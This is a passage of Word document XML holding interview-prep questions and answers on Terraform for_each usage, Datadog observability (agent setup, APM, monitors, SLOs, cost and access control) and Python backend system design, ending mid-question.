        <w:t>A: Use a dynamic block when a resource has repeatable nested configuration and the number of blocks should be controlled by input data. For example, a security group may need a variable list of ingress rules, or an S3 bucket may need a variable list of lifecycle rules. It keeps modules reusable while avoiding duplicated HCL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How would you create multiple S3 buckets in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define the desired bucket names as a set or map and use for_each on aws_s3_bucket. For example, variable bucket_names can be a set(string), then resource aws_s3_bucket buckets { for_each = var.bucket_names bucket = each.value }. If each bucket needs different settings, use a map of objects and read fields from each.value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. What is the meaning of each.value in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: each.value is the value of the current item when a resource, module, or dynamic block uses for_each. If for_each is a set of strings, each.value is the current string. If for_each is a map, each.key is the map key and each.value is the map value, which may be an object containing multiple attributes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Why do we use each.value?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: We use each.value to parameterize each repeated resource or nested block with the data for the current item in a for_each loop. It lets one resource block create many correctly configured resources without hardcoding names, ports, tags, lifecycle rules, or other per-item settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. Why do we use toset() in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: toset() converts a list or tuple into a set, which is often needed because for_each accepts a map or set of strings. It also removes duplicates and makes the collection identity based on values rather than list indexes, which is safer than count for resources where you do not want index shifts to recreate infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 52 - Datadog Observability Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you install and configure the Datadog Agent on a Kubernetes or GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Install the Datadog Agent as a DaemonSet, usually with the Datadog Helm chart or Operator, so every node runs an Agent pod. Store the API key in a Kubernetes Secret, set the cluster name and tags, enable kube-state-metrics/CoreDNS/node/container collection, and turn on logs, APM, process, or network monitoring only when needed. In GKE, also configure the GCP integration for cloud-level metrics and use tolerations so the Agent runs on important node pools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How does Datadog collect metrics, logs, and traces from Kubernetes workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Datadog collects node and container metrics through the Agent, cluster object state through kube-state-metrics or the Cluster Agent, logs from container stdout/stderr or files, and traces through APM libraries sending spans to the Agent. Kubernetes labels, annotations, pod metadata, service names, environment, and version tags are attached so metrics, logs, and traces can be filtered and correlated by service, namespace, cluster, and deployment version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you enable Datadog APM for a microservice running on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/APM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Add the Datadog tracing library for the application language, set service, env, and version tags, and point the app to the Datadog Agent trace endpoint. In Kubernetes, expose the Agent APM port, inject environment variables through the Deployment, and verify traces appear with correct service names, resources, errors, latency, and dependencies. For production, configure sampling, sensitive-data scrubbing, and trace-log correlation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you correlate Datadog logs with traces for faster debugging?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enable trace-log correlation in the Datadog tracing library so trace_id and span_id are injected into structured application logs. Ship logs with the Datadog Agent, parse them as JSON where possible, and standardize tags like service, env, version, cluster, namespace, and pod. Then an engineer can jump from a slow trace to the exact related log lines, or from an error log to the full request trace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What Datadog monitors would you create for a production API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create monitors for user-impacting golden signals first: availability, 5xx error rate, p95/p99 latency, request rate anomalies, saturation, and dependency failures. Add Kubernetes monitors for CrashLoopBackOff, pending pods, restart spikes, CPU/memory pressure, HPA maxed out, node readiness, and ingress/load-balancer errors. Alerts should have owners, severity, routing, runbooks, dashboard links, and thresholds tied to SLOs rather than every noisy metric.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you define SLOs and error-budget alerts in Datadog?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/SRE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define SLIs from request success rate, latency, or availability using Datadog APM, metrics, or logs. Set SLO targets such as 99.9% successful requests over 30 days, then create burn-rate alerts for fast burns and slow burns so teams catch both major outages and gradual degradation. Tie alerts to service ownership, on-call routing, release policy, and error-budget decisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What dashboards would you build in Datadog for application teams, SREs, and leadership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Dashboards</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For application teams, build service dashboards with RED metrics, dependency latency, error traces, recent deployments, and logs. For SREs, build platform dashboards covering clusters, nodes, workloads, ingress, SLO burn, incidents, and capacity. For leadership, show availability, customer-impacting incidents, SLO compliance, MTTR, change failure rate, and cost/reliability trends without overwhelming low-level details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. A Datadog alert shows p95 latency increased after a deployment. How would you investigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start from the alert timeframe and compare latency by service, endpoint, env, version, region, and deployment marker. Use APM traces to identify the slow span, check errors and logs correlated to those traces, then inspect dependencies such as database, cache, downstream APIs, and Kubernetes resource saturation. If the new version is the clear trigger and user impact is high, pause rollout or roll back while continuing root-cause analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you control Datadog cost for logs, custom metrics, and high-cardinality tags?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Cost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Control cost by reducing noisy log ingestion, using exclusion filters, sampling debug logs, setting retention by value, and indexing only logs needed for search/alerting. Avoid high-cardinality tags such as request IDs, user IDs, pod UIDs, or unbounded URLs on custom metrics. Review custom metric volume, container counts, APM ingestion, and dashboard/monitor usage regularly with ownership and cleanup policies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. When would you use Datadog Synthetic Monitoring and Real User Monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Synthetics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Synthetic Monitoring to test critical user journeys or APIs from controlled locations on a schedule, even when real traffic is low. Use Real User Monitoring to understand actual browser/mobile user experience, frontend errors, page load time, geographic latency, and the impact of releases on real customers. Together they help distinguish external availability from real user experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you integrate Datadog with GCP, Slack, PagerDuty, and CI/CD pipelines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Integrations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the GCP integration to collect Cloud Monitoring metrics, audit logs, and service-level telemetry, then tag resources consistently by project, environment, team, and service. Route Datadog monitors to Slack for visibility and PagerDuty for actionable incidents. In CI/CD, send deployment events and version tags to Datadog so dashboards and APM can correlate regressions with releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What security and access controls would you apply in Datadog for a large engineering organization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use SSO/SAML, SCIM provisioning, MFA, role-based access control, teams, restricted API/application keys, and least-privilege permissions for dashboards, monitors, logs, and security products. Protect sensitive logs with scrubbing and pipelines, limit who can create high-cost ingestion patterns, audit changes to monitors and integrations, and separate production access from lower environments where needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 53 - Python Developer System Design Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you design a scalable Python backend API for a high-traffic web application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with clear requirements: read/write volume, latency SLO, data consistency, authentication, and failure tolerance. Use FastAPI or Django behind a load balancer, stateless app replicas, a relational database for core data, Redis for caching/rate limiting, a queue for slow background work, and object storage for large files. Add autoscaling, structured logs, metrics, traces, health checks, CI/CD, database migrations, and rollback support so the service can scale and be operated safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How would you design REST API endpoints, request validation, pagination, filtering, and versioning in a Python service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/API Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Design resource-oriented endpoints with clear nouns, HTTP methods, status codes, and consistent error responses. Use Pydantic, DRF serializers, or equivalent schemas for request and response validation. Add pagination with cursor or limit/offset depending on scale, whitelist filter/sort fields, and version breaking changes through /v1 and /v2 or version headers. Document the API with OpenAPI and add contract tests for important consumers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you design the database layer for a Python application, including schema design, indexes, migrations, transactions, and connection pooling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Database Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model tables around access patterns and data integrity, with primary keys, foreign keys, unique constraints, and indexes for common queries. Use SQLAlchemy, Django ORM, or another ORM carefully, but inspect generated SQL for hot paths. Manage schema changes with Alembic or Django migrations, wrap multi-step writes in transactions, size connection pools to avoid exhausting the database, and add read replicas or partitioning only when real load requires it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you add Redis caching to a Python backend, and how would you handle cache invalidation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Caching</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cache expensive reads or frequently requested data with deterministic keys, TTLs, and serialization that is safe to evolve. Use cache-aside for most API data: read from Redis, fall back to DB on miss, then populate the cache. Invalidate or update affected keys on writes, use short TTLs for data that can tolerate staleness, add jitter to avoid stampedes, and monitor hit rate, evictions, latency, and memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. When would you use Celery, RQ, Cloud Tasks, Pub/Sub, or Kafka for background processing in a Python application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Async Processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a background system when work is slow, retryable, scheduled, or should not block the request path. Celery is good for Python-heavy distributed task queues with retries and scheduling; RQ is simpler for Redis-backed jobs; Cloud Tasks is strong for durable HTTP task dispatch; Pub/Sub is good for event-driven fanout; Kafka is better for high-throughput event streams and replay. Choose based on durability, ordering, throughput, retry behavior, and operational burden.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you choose between asyncio, threads, multiprocessing, and worker queues in Python system design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Concurrency</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use asyncio for high-concurrency I/O when libraries are truly async, threads for blocking I/O libraries that release the GIL or for simple parallel I/O, multiprocessing for CPU-bound work that needs multiple cores, and worker queues for durable work outside the request lifecycle. For web APIs, keep request handlers lightweight and push long-running jobs to workers so latency and availability are predictable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you design retries, timeouts, idempotency, and circuit breakers for a Python service calling external APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Set explicit connect and read timeouts for every outbound call, retry only transient failures with exponential backoff and jitter, and use idempotency keys for operations that may create or mutate state. Add circuit breakers or bulkheads when a dependency is failing so callers fail fast instead of piling up. Log dependency latency, status codes, retry counts, and fallback behavior, and expose these as metrics for alerting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you secure a Python backend service, including authentication, authorization, secrets, input validation, and dependency security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Validate identity with JWT/OAuth2/IAP or a trusted gateway, enforce authorization with roles/scopes or policy checks per endpoint, and never trust client-supplied tenant or role data. Store secrets in Secret Manager or Vault, validate inputs with schemas, use parameterized queries, sanitize file uploads, and apply least privilege to service accounts. Pin dependencies, scan for CVEs, keep base images patched, and avoid logging tokens, PII, or secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What logs, metrics, traces, health checks, and dashboards would you add to a production Python service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Add structured JSON logs with request ID, trace ID, user or tenant context where safe, endpoint, status, latency, and error details. Emit RED metrics: request rate, errors, duration, plus saturation metrics like CPU, memory, worker queue depth, DB pool usage, and dependency latency. Add OpenTelemetry traces across database and external calls, /healthz and /readyz endpoints, and dashboards for golden signals, deployments, incidents, and SLO burn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you test a Python backend system across unit tests, integration tests, contract tests, load tests, and end-to-end tests?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use unit tests for pure business logic, integration tests with a real or containerized database/cache, API tests with TestClient or httpx, and contract tests for external consumers or providers. Add migration tests, auth/security tests, failure-path tests, and load tests for critical endpoints. In CI, run fast tests on every PR and heavier integration/load suites on merge or release candidates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you containerize and deploy a Python web service on Kubernetes or Cloud Run?</w:t>
      </w:r>
    </w:p>
    <w:p>
